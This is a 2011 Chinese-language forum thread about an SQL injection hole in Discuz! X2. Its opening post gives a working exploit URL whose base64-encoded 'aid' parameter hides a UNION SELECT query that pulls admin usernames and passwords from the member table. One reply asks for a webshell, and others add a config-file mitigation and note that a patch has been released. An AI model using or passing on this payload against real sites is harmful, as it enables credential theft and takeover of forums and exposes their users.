Discuz! X2 SQL注射漏洞

s884812 · 发表于 2011-6-29 14:17:37

http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

默認前墜之下爆出管理員帳號密碼。

adnim · 发表于 2011-6-29 14:23:04

求getwebshell

神马皆浮云 · 发表于 2011-6-29 14:23:29

新版本我向来不用，不稳定，没经历风雨。我用7.2

vvx.cc · 发表于 2011-6-29 14:27:44

原帖由 vvx.cc 於 2011-6-29 14:55 發表

新版本我向來不用，不穩定，沒經歷風雨。我用7.2 7.2有xxs漏洞額..

s884812 · 发表于 2011-6-29 14:53:48

config/config_global.php 文件中查找代码
$_config['security']['querysafe']['daction']['3'] = '(select';
在下面新增一行代码
$_config['security']['querysafe']['daction'][] = 'unionall';

3389 · 发表于 2011-6-29 14:55:13

http://www.discuz.net/thread-2168918-1-1.html

monface · 发表于 2011-6-29 14:57:14

真伤不起啊，又爆洞洞给解释下是啥子意思？

nevernozyzit · 发表于 2011-6-29 16:06:04

补丁出来了...

ali727 · 发表于 2011-6-29 16:13:51

官方升级了？

wdlth · 发表于 2011-6-29 16:22:51

都是些临时工写的代码。

		自动登录	找回密码
密码			立即注册